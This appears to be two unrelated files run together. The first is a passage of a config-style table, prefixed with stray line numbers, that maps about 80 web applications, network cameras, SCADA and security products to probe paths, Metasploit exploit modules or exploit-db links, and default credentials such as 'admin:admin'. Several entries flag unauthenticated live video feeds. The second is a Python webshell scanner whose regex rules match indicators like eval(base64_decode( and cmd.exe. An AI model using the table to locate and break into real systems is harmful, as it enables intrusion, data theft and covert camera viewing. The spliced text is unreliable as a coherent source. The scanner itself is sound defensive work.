'admin:admin' 231 | 232 | Apache Roller: 233 | 路径1: '/roller' 234 | 路径2: '' 235 | 版本: '' 236 | exp: './exploits/multi/http/apache_roller_ognl_injection.rb' 237 | 默认密码: 'admin:admin' 238 | 239 | PhpTax pfilez: 240 | 路径1: '/phptax/' 241 | 路径2: 
'' 242 | 版本: '' 243 | exp: './exploits/multi/http/phptax_exec.rb' 244 | 默认密码: 'admin:admin' 245 | 246 | AjaXplorer: 247 | 路径1: '/AjaXplorer-2.5.5/plugins/access.ssh/checkInstall.php' 248 | 路径2: '' 249 | 版本: '' 250 | exp: './exploits/multi/http/ajaxplorer_checkinstall_exec.rb' 251 | 默认密码: 'admin:admin' 252 | 253 | phpMyAdmin: 254 | 路径1: '/phpmyadmin/' 255 | 路径2: '' 256 | 版本: '' 257 | exp: './exploits/multi/http/phpmyadmin_preg_replace.rb' 258 | 默认密码: 'admin:admin' 259 | 260 | vTiger CRM: 261 | 路径1: '/vtigercrm/index.php?action=index&module=Home' 262 | 路径2: '/vtigercrm/index.php?module=Settings&action=ModuleManager&parenttab=Settings' 263 | 版本: '' 264 | exp: './exploits/multi/http/vtiger_soap_upload.rb, ./exploits/multi/http/vtiger_php_exec.rb' 265 | 默认密码: 'admin:admin' 266 | 267 | eXtplorer: 268 | 路径1: '/com_extplorer_2.1.0/' 269 | 路径2: '' 270 | 版本: '' 271 | exp: './exploits/multi/http/extplorer_upload_exec.rb' 272 | 默认密码: 'admin:admin' 273 | 274 | Splunk: 275 | 路径1: '/en-US/app/launcher/home' 276 | 路径2: '/en-US/manager/search/apps/local' 277 | 版本: '' 278 | exp: './exploit/multi/http/splunk_upload_app_exec, http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html' 279 | 默认密码: 'admin:admin' 280 | 281 | FreePBX: 282 | 路径1: '/admin/admin/config.php?type=setup&display=general' 283 | 路径2: '/admin/admin/reports.php' 284 | 版本: '' 285 | exp: 'https://www.exploit-db.com/search/?description=freepbx' 286 | 默认密码: 'admin:admin' 287 | 288 | ManageEngine ServiceDesk Plus: 289 | 路径1: '/WOListView.do' 290 | 路径2: '/admin/admin/reports.php' 291 | 版本: '/SetUpWizard.do?forwardTo=site' 292 | exp: './exploit/multi/http/manageengine_auth_upload' 293 | 默认密码: 'administrator:administrator' 294 | 295 | WhatsUp Gold IPSwitch: 296 | 路径1: '/NmConsole/CoreNm/User/DlgUserLogin/DlgUserLogin.asp' 297 | 路径2: '/NmConsole/Workspace/HomeWorkspace/HomeWorkspace.asp' 298 | 版本: 'Ipswitch WhatsUp Gold premium Edition' 299 | exp: 'https://www.exploit-db.com/exploits/20035/' 
300 | 默认密码: 'admin:admin' 301 | 302 | OpenX: 303 | 路径1: '/openx/' 304 | 路径2: '' 305 | 版本: '' 306 | exp: './exploits/multi/http/openx_backdoor_php.rb' 307 | 默认密码: 'admin:admin' 308 | 309 | Glossword: 310 | 路径1: '/glossword/1.8/' 311 | 路径2: '' 312 | 版本: '' 313 | exp: './exploits/multi/http/glossword_upload_exec.rb' 314 | 默认密码: 'admin:admin' 315 | 316 | GLPI: 317 | 路径1: '/glpi/' 318 | 路径2: '' 319 | 版本: '' 320 | exp: './exploits/multi/http/glpi_install_rce.rb' 321 | 默认密码: 'admin:admin' 322 | 323 | Kordil EDMS: 324 | 路径1: '/kordil_edms/' 325 | 路径2: '' 326 | 版本: '' 327 | exp: './exploits/multi/http/kordil_edms_upload_exec.rb' 328 | 默认密码: 'admin:admin' 329 | 330 | Movable Type: 331 | 路径1: '/mt' 332 | 路径2: '' 333 | 版本: '' 334 | exp: './exploits/multi/http/movabletype_upgrade_exec.rb' 335 | 默认密码: 'admin:admin' 336 | 337 | Zabbix: 338 | 路径1: '/zabbix/' 339 | 路径2: '/zabbix/scripts.php' 340 | 版本: '' 341 | exp: './exploits/multi/http/zabbix_script_exec.rb' 342 | 默认密码: 'admin:admin' 343 | 344 | PHP Volunteer Management System: 345 | 路径1: '/bf102/' 346 | 路径2: '' 347 | 版本: '' 348 | exp: './exploits/multi/http/php_volunteer_upload_exec.rb' 349 | 默认密码: 'admin:admin' 350 | 351 | appRain CMF: 352 | 路径1: '/appRain-q-0.1.5' 353 | 路径2: '' 354 | 版本: '' 355 | exp: './exploits/multi/http/apprain_upload_exec.rb' 356 | 默认密码: 'admin:admin' 357 | 358 | Mutiny: 359 | 路径1: '/interface/' 360 | 路径2: '' 361 | 版本: '' 362 | exp: './exploits/multi/http/mutiny_subnetmask_exec.rb' 363 | 默认密码: 'admin:admin' 364 | 365 | Tiki Wiki CMS: 366 | 路径1: '/tiki/' 367 | 路径2: '' 368 | 版本: '' 369 | exp: './exploits/unix/webapp/tikiwiki_unserialize_exec.rb' 370 | 默认密码: 'admin:admin' 371 | 372 | Invision Power Board: 373 | 路径1: '/forums/' 374 | 路径2: '' 375 | 版本: '' 376 | exp: './exploits/unix/webapp/invision_pboard_unserialize_exec.rb' 377 | 默认密码: 'admin:admin' 378 | 379 | App_Name: 380 | 路径1: '/wordpress' 381 | 路径2: '' 382 | 版本: '' 383 | exp: './exploits/unix/webapp/wp_property_upload_exec.rb, 
./exploits/unix/webapp/wp_asset_manager_upload_exec.rb' 384 | 默认密码: 'admin:admin' 385 | 386 | Zimbra Admin: 387 | 路径1: '/zimbraAdmin' 388 | 路径2: '' 389 | 版本: '' 390 | exp: './exploits/unix/webapp/zimbra_lfi.rb' 391 | 默认密码: 'admin:admin' 392 | 393 | Nagios3: 394 | 路径1: '/nagios3/cgi-bin/history.cgi' 395 | 路径2: '' 396 | 版本: '' 397 | exp: './exploits/unix/webapp/nagios3_history_cgi.rb' 398 | 默认密码: 'admin:admin' 399 | 400 | PHP-Charts: 401 | 路径1: '/php-charts_v1.0/' 402 | 路径2: '' 403 | 版本: '' 404 | exp: './exploits/unix/webapp/php_charts_exec.rb' 405 | 默认密码: 'admin:admin' 406 | 407 | Open Flash Chart v2: 408 | 路径1: '/php-ofc-library/' 409 | 路径2: '' 410 | 版本: '' 411 | exp: './exploits/unix/webapp/open_flash_chart_upload_exec.rb' 412 | 默认密码: 'admin:admin' 413 | 414 | LibrettoCMS File Manager: 415 | 路径1: '/librettoCMS_v.2.2.2/' 416 | 路径2: '' 417 | 版本: '' 418 | exp: './exploits/unix/webapp/libretto_upload_exec.rb' 419 | 默认密码: 'admin:admin' 420 | 421 | Horde Framework: 422 | 路径1: '/horde/' 423 | 路径2: '' 424 | 版本: '' 425 | exp: './exploits/unix/webapp/horde_unserialize_exec.rb' 426 | 默认密码: 'admin:admin' 427 | 428 | XODA: 429 | 路径1: '/xoda/' 430 | 路径2: '' 431 | 版本: '' 432 | exp: './exploits/unix/webapp/xoda_file_upload.rb' 433 | 默认密码: 'admin:admin' 434 | 435 | ZoneMinder Video Server: 436 | 路径1: '/zm/' 437 | 路径2: '' 438 | 版本: '' 439 | exp: './exploits/unix/webapp/zoneminder_packagecontrol_exec.rb' 440 | 默认密码: 'admin:admin' 441 | 442 | SePortal: 443 | 路径1: '/seportal' 444 | 路径2: '' 445 | 版本: '' 446 | exp: './exploits/unix/webapp/seportal_sqli_exec.rb' 447 | 默认密码: 'admin:admin' 448 | 449 | WebTester: 450 | 路径1: '/webtester5/' 451 | 路径2: '' 452 | 版本: '' 453 | exp: './exploits/unix/webapp/webtester_exec.rb' 454 | 默认密码: 'admin:admin' 455 | 456 | Hastymail: 457 | 路径1: '/hastymail2/' 458 | 路径2: '' 459 | 版本: '' 460 | exp: './exploits/unix/webapp/hastymail_exec.rb' 461 | 默认密码: 'admin:admin' 462 | 463 | Joomla: 464 | 路径1: '/joomla' 465 | 路径2: '' 466 | 版本: '' 467 | exp: 
'./exploits/unix/webapp/joomla_media_upload_exec.rb' 468 | 默认密码: 'admin:admin' 469 | 470 | Kimai Time Tracking: 471 | 路径1: '/kimai/' 472 | 路径2: '' 473 | 版本: '' 474 | exp: './exploits/unix/webapp/kimai_sqli.rb' 475 | 默认密码: 'admin:admin' 476 | 477 | FlashChat: 478 | 路径1: '/chat/' 479 | 路径2: '' 480 | 版本: '' 481 | exp: './exploits/unix/webapp/flashchat_upload_exec.rb' 482 | 默认密码: 'admin:admin' 483 | 484 | Simple E-Document: 485 | 路径1: '/simple_e_document_v_1_31/' 486 | 路径2: '' 487 | 版本: '' 488 | exp: './exploits/unix/webapp/simple_e_document_upload_exec.rb' 489 | 默认密码: 'admin:admin' 490 | 491 | EGallery: 492 | 路径1: '/sample' 493 | 路径2: '' 494 | 版本: '' 495 | exp: './exploits/unix/webapp/egallery_upload_exec.rb' 496 | 默认密码: 'admin:admin' 497 | 498 | OpenEMR: 499 | 路径1: '/openemr' 500 | 路径2: '' 501 | 版本: '' 502 | exp: './exploits/unix/webapp/openemr_upload_exec.rb, ./exploits/unix/webapp/openemr_sqli_privesc_upload.rb' 503 | 默认密码: 'admin:admin' 504 | 505 | Basilic: 506 | 路径1: '/basilic-1.5.14/' 507 | 路径2: '' 508 | 版本: '' 509 | exp: './exploits/unix/webapp/basilic_diff_exec.rb' 510 | 默认密码: 'admin:admin' 511 | 512 | Narcissus: 513 | 路径1: '/narcissus-master/' 514 | 路径2: '' 515 | 版本: '' 516 | exp: './exploits/unix/webapp/narcissus_backend_exec.rb' 517 | 默认密码: 'admin:admin' 518 | 519 | Project Pier: 520 | 路径1: '/pp088/' 521 | 路径2: '' 522 | 版本: '' 523 | exp: './exploits/unix/webapp/projectpier_upload_exec.rb' 524 | 默认密码: 'admin:admin' 525 | 526 | OpenSIS: 527 | 路径1: '/opensis/' 528 | 路径2: '' 529 | 版本: '' 530 | exp: './exploits/unix/webapp/opensis_modname_exec.rb' 531 | 默认密码: 'admin:admin' 532 | 533 | V-CMS: 534 | 路径1: '/vcms/' 535 | 路径2: '' 536 | 版本: '' 537 | exp: './exploits/linux/http/vcms_upload.rb' 538 | 默认密码: 'admin:admin' 539 | 540 | Zabbix: 541 | 路径1: '/zabbix' 542 | 路径2: '' 543 | 版本: '' 544 | exp: './exploits/linux/http/zabbix_sqli.rb' 545 | 默认密码: 'admin:zabbix' 546 | 547 | WebCalendar: 548 | 路径1: '/WebCalendar-1.2.4/' 549 | 路径2: '' 550 | 版本: '' 551 | exp: 
'./exploits/linux/http/webcalendar_settings_exec.rb' 552 | 默认密码: 'admin:admin' 553 | 554 | Symantec Web Gateway: 555 | 路径1: '/spywall/pbcontrol.php' 556 | 路径2: '' 557 | 版本: '' 558 | exp: './exploits/linux/http/symantec_web_gateway_pbcontrol.rb' 559 | 默认密码: 'admin:admin' 560 | 561 | WeBid: 562 | 路径1: '/WeBid' 563 | 路径2: '' 564 | 版本: '' 565 | exp: './exploits/linux/http/webid_converter.rb' 566 | 默认密码: 'admin:admin' 567 | 568 | DoliWamp: 569 | 路径1: '/dolibarr/' 570 | 路径2: '' 571 | 版本: '' 572 | exp: './exploits/linux/http/dolibarr_cmd_exec.rb, ./auxiliary/gather/doliwamp_traversal_creds.rb' 573 | 默认密码: 'admin:admin' 574 | 575 | Ruby on Rails Devise: 576 | 路径1: '/users/password' 577 | 路径2: '' 578 | 版本: '' 579 | exp: './auxiliary/admin/http/rails_devise_pass_reset.rb' 580 | 默认密码: 'admin:admin' 581 | 582 | Linksys WRT54GL: 583 | 路径1: '/apply.cgi' 584 | 路径2: '' 585 | 版本: '' 586 | exp: './auxiliary/admin/http/linksys_wrt54gl_exec.rb' 587 | 默认密码: 'admin:admin' 588 | 589 | JBoss Seam 2: 590 | 路径1: '/seam-booking/home.seam' 591 | 路径2: '' 592 | 版本: '' 593 | exp: './auxiliary/admin/http/jboss_seam_exec.rb' 594 | 默认密码: 'admin:admin' 595 | 596 | Plixer Scrutinizer NetFlow: 597 | 路径1: '/cgi-bin/admin.cgi' 598 | 路径2: '' 599 | 版本: '' 600 | exp: './auxiliary/admin/http/scrutinizer_add_user.rb' 601 | 默认密码: 'admin:admin' 602 | 603 | Openbravo ERP: 604 | 路径1: '/openbravo/' 605 | 路径2: '' 606 | 版本: '' 607 | exp: './auxiliary/admin/http/openbravo_xxe.rb' 608 | 默认密码: 'admin:admin' 609 | 610 | Advantech WebAccess: 611 | 路径1: '/BEMS' 612 | 路径2: '' 613 | 版本: '' 614 | exp: './auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb' 615 | 默认密码: 'admin:admin' 616 | 617 | GE Proficy Cimplicity WebView: 618 | 路径1: '/CimWeb' 619 | 路径2: '' 620 | 版本: '' 621 | exp: './auxiliary/admin/scada/ge_proficy_substitute_traversal.rb' 622 | 默认密码: 'admin:admin' 623 | 624 | Cisco Secure ACS: 625 | 路径1: '/PI/services/UCP/' 626 | 路径2: '' 627 | 版本: '' 628 | exp: './auxiliary/admin/cisco/cisco_secure_acs_bypass.rb' 
629 | 默认密码: 'admin:admin' 630 | 631 | CouchDB: 632 | 路径1: '/_all_dbs' 633 | 路径2: '' 634 | 版本: '' 635 | exp: './auxiliary/scanner/couchdb/couchdb_enum.rb' 636 | 默认密码: 'admin:admin' 637 | 638 | SAP SOAP Service: 639 | 路径1: '/sap/bc/soap/rfc' 640 | 路径2: '' 641 | 版本: '' 642 | exp: './auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb' 643 | 默认密码: 'admin:admin' 644 | 645 | Apache ActiveMQ: 646 | 路径1: '/admin/index.jsp' 647 | 路径2: '' 648 | 版本: '' 649 | exp: './auxiliary/scanner/http/apache_activemq_source_disclosure.rb' 650 | 默认密码: 'admin:admin' 651 | 652 | SVN: 653 | 路径1: '/.svn/' 654 | 路径2: '' 655 | 版本: '' 656 | exp: './auxiliary/scanner/http/svn_wcdb_scanner.rb' 657 | 默认密码: 'admin:admin' 658 | 659 | Bitweaver: 660 | 路径1: '/bitweaver/' 661 | 路径2: '' 662 | 版本: '' 663 | exp: './auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb' 664 | 默认密码: 'admin:admin' 665 | 666 | Dell iDRAC: 667 | 路径1: '/data/login' 668 | 路径2: '' 669 | 版本: '' 670 | exp: './auxiliary/scanner/http/dell_idrac.rb' 671 | 默认密码: 'admin:admin' 672 | 673 | JBoss Status Servlet: 674 | 路径1: '/status' 675 | 路径2: '' 676 | 版本: '' 677 | exp: './auxiliary/scanner/http/jboss_status.rb' 678 | 默认密码: 'admin:admin' 679 | 680 | OpenMind Message-OS Portal: 681 | 路径1: '/provision/index.php' 682 | 路径2: '' 683 | 版本: '' 684 | exp: './auxiliary/scanner/http/openmind_messageos_login.rb' 685 | 默认密码: 'admin:admin' 686 | 687 | ClanSphere: 688 | 路径1: '/clansphere_2011.3/' 689 | 路径2: '' 690 | 版本: '' 691 | exp: './auxiliary/scanner/http/clansphere_traversal.rb' 692 | 默认密码: 'admin:admin' 693 | 694 | InfoVista VistaPortal Application: 695 | 路径1: '/VPortal/mgtconsole/CheckPassword.jsp' 696 | 路径2: '' 697 | 版本: '' 698 | exp: './auxiliary/scanner/http/infovista_enum.rb' 699 | 默认密码: 'admin:admin' 700 | 701 | Atlassian Crowd: 702 | 路径1: '/crowd/services' 703 | 路径2: '' 704 | 版本: '' 705 | exp: './auxiliary/scanner/http/atlassian_crowd_fileaccess.rb' 706 | 默认密码: 'admin:admin' 707 | 708 | S40 CMS: 709 | 路径1: '/s40/' 710 | 路径2: '' 711 | 版本: 
'' 712 | exp: './auxiliary/scanner/http/s40_traversal.rb' 713 | 默认密码: 'admin:admin' 714 | 715 | MyBB: 716 | 路径1: '/forum' 717 | 路径2: '' 718 | 版本: '' 719 | exp: './auxiliary/gather/mybb_db_fingerprint.rb' 720 | 默认密码: 'admin:admin' 721 | 722 | IBM Lotus Notes: 723 | 路径1: '/userinfo/search' 724 | 路径2: '' 725 | 版本: '' 726 | exp: './auxiliary/gather/ibm_sametime_enumerate_users.rb' 727 | 默认密码: 'admin:admin' 728 | 729 | Apache Rave: 730 | 路径1: '/portal' 731 | 路径2: '' 732 | 版本: '' 733 | exp: './auxiliary/gather/apache_rave_creds.rb' 734 | 默认密码: 'admin:admin' 735 | 736 | Drupal OpenID: 737 | 路径1: '/drupal' 738 | 路径2: '' 739 | 版本: '' 740 | exp: './auxiliary/gather/drupal_openid_xxe.rb' 741 | 默认密码: 'admin:admin' 742 | 743 | Symantec Endpoint Protection Manager: 744 | 路径1: '/servlet/ConsoleServlet' 745 | 路径2: '' 746 | 版本: '' 747 | exp: '/exploits/windows/http/sepm_auth_bypass_rce' 748 | 默认密码: 'admin:admin' 749 | 750 | Panasonic Network Camera WV-SF335: 751 | 路径1: '/live/index.html?Language=0' 752 | 路径2: '/admin/index.html?Language=0' 753 | 版本: '' 754 | exp: 'Unauthenticate access to LIVE video feed' 755 | 默认密码: 'admin:admin' 756 | 757 | AXIS Q7404 Video Encoder: 758 | 路径1: '/view/viewer_index.shtml' 759 | 路径2: '/operator/action_rules.shtml' 760 | 版本: '' 761 | exp: 'Unauthenticate access to LIVE video feed' 762 | 默认密码: 'admin:admin' 763 | 764 | Vivotek Mega-Pixel Network Camera: 765 | 路径1: '/setup/system/system.html' 766 | 路径2: '/media/media_settings.html' 767 | 版本: '' 768 | exp: 'Unauthenticate access to LIVE video feed' 769 | 默认密码: 'admin:admin' 770 | 771 | SVSi N-Command N8002: 772 | 路径1: '/userAdmin.php' 773 | 路径2: '' 774 | 版本: '' 775 | exp: 'Unauthenticate access to LIVE video feed' 776 | 默认密码: 'admin:admin' 777 | 778 | SVSi N-Series 2000 Decoder: 779 | 路径1: '/localplay.php' 780 | 路径2: '/edid.php' 781 | 版本: '' 782 | exp: 'Unauthenticate access to LIVE video feed' 783 | 默认密码: 'admin:admin' 784 | 785 | AlienVault USM: 786 | 路径1: '/ossim/session/login.php' 787 | 路径2: 
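#!/usr/bin/python
# coding=utf-8
"""Recursively scan a directory for web-shell indicators in server-side scripts.

Usage::

    python webshellscan.py /root/

Only files whose extension is listed in ``SCRIPT_EXTENSIONS`` are inspected.
Each candidate is read as raw bytes and matched against every pattern in
``rulelist``; the first matching rule is reported and the file is then
skipped, so every file is listed at most once.

The former ``reload(sys); sys.setdefaultencoding("utf-8")`` hack was dropped:
file contents and patterns are handled as bytes, so no implicit text
conversion happens, and the hack does not exist on Python 3.  The module runs
on Python 2.7 and Python 3, and importing it no longer starts a scan -- the
scan only runs when the file is executed as a script.
"""
import os
import re
import sys

# Extensions of server-side script files worth scanning.  Compared
# case-insensitively, so ``shell.PHP`` or ``x.Asp`` are inspected as well.
SCRIPT_EXTENSIONS = ('php', 'jsp', 'asp', 'aspx', 'jspx')

# Detection rules.  Raw strings keep the regex escapes (``\$``, ``\[``, ...)
# byte-identical to the original patterns without Python 3's
# invalid-escape-sequence warnings; the base64 rule needs both quote kinds
# and is therefore written with doubled backslashes instead.
rulelist = [
    r'(\$_(GET|POST|REQUEST)\[.{0,15}\]\(\$_(GET|POST|REQUEST)\[.{0,15}\]\))',
    '(base64_decode\\([\'"][\\w\\+/=]{200,}[\'"]\\))',
    r'eval\(base64_decode\(',
    r'(eval\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
    r'(assert\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
    r'(\$[\w_]{0,15}\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
    r'(wscript\.shell)',
    r'(gethostbyname\()',
    r'(cmd\.exe)',
    r'(shell\.application)',
    r'(documents\s+and\s+settings)',
    r'(system32)',
    r'(serv-u)',
    r'(提权)',
    r'(phpspy)',
    r'(后门)',
    r'(webshell)',
    r'(Program\s+Files)',
]


def _compile_rules(rules):
    """Compile *rules* once into bytes regexes (files are read in binary mode).

    On Python 2 the source literals already are byte strings; on Python 3
    they are text and are UTF-8 encoded so the Chinese rules match the raw
    file bytes.
    """
    return [
        re.compile(rule if isinstance(rule, bytes) else rule.encode('utf-8'))
        for rule in rules
    ]


def _extension(filename):
    """Return the lower-cased text after the last ``.`` of *filename*, or ``''``."""
    if '.' not in filename:
        return ''
    return filename.rpartition('.')[2].lower()


def _as_text(match):
    """Make a ``findall`` hit printable: decode bytes, recurse into group tuples.

    On Python 2 a hit already is a (byte) ``str`` and is returned unchanged,
    which keeps the original output; on Python 3 the bytes are decoded.
    """
    if isinstance(match, tuple):
        return tuple(_as_text(part) for part in match)
    if isinstance(match, str):
        return match
    return match.decode('utf-8', 'replace')


def Scan(path):
    """Walk *path* and report files that match one of ``rulelist``.

    Args:
        path: directory to scan recursively.

    Returns:
        list of ``(file_path, match)`` tuples, one per flagged file, where
        ``match`` is the first hit of the first matching rule (a string, or a
        tuple of strings when the rule has several groups).  The same
        information is printed as it is found.  Unreadable files are reported
        and skipped instead of aborting the whole scan.
    """
    patterns = _compile_rules(rulelist)  # compiled once, not per file per rule
    findings = []
    for root, _dirs, files in os.walk(path):
        for name in sorted(files):
            if _extension(name) not in SCRIPT_EXTENSIONS:
                continue
            fullpath = os.path.join(root, name)
            try:
                # Binary mode: the contents need not be valid UTF-8, and the
                # rules are matched as bytes anyway.
                with open(fullpath, 'rb') as handle:
                    data = handle.read()
            except (IOError, OSError) as exc:
                print('无法读取:' + fullpath + ' (' + str(exc) + ')')
                continue
            for pattern in patterns:
                result = pattern.findall(data)
                if result:
                    hit = _as_text(result[0])
                    findings.append((fullpath, hit))
                    print('文件:' + fullpath)
                    print('恶意代码:' + str(hit))
                    print('\n\n')
                    break  # one report per file, as before
    return findings


def main(argv=None):
    """Command-line entry point; returns the process exit status.

    Args:
        argv: argument list without the program name; defaults to
            ``sys.argv[1:]``.  The single argument is the directory to scan.

    Returns:
        0 after a completed scan, 1 when the directory does not exist,
        2 when no directory was given.
    """
    args = sys.argv[1:] if argv is None else list(argv)
    if not args:
        print('提示:用法 python webshellscan.py <扫描目录>')
        return 2
    target = args[0]
    # isdir (rather than lexists) rejects plain files and dangling symlinks,
    # which os.walk would otherwise silently skip, "scanning" nothing.
    if not os.path.isdir(target):
        print('提示:指定的扫描目录不存在--- ( \'o′)!!凸')
        return 1
    print('\n\n开始扫描:' + target)
    print(' 可疑文件 ')
    print('########################################')
    Scan(target)
    print('########################################')
    print('提示:扫描完成-- O(∩_∩)O哈哈~')
    return 0


if __name__ == '__main__':
    sys.exit(main())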
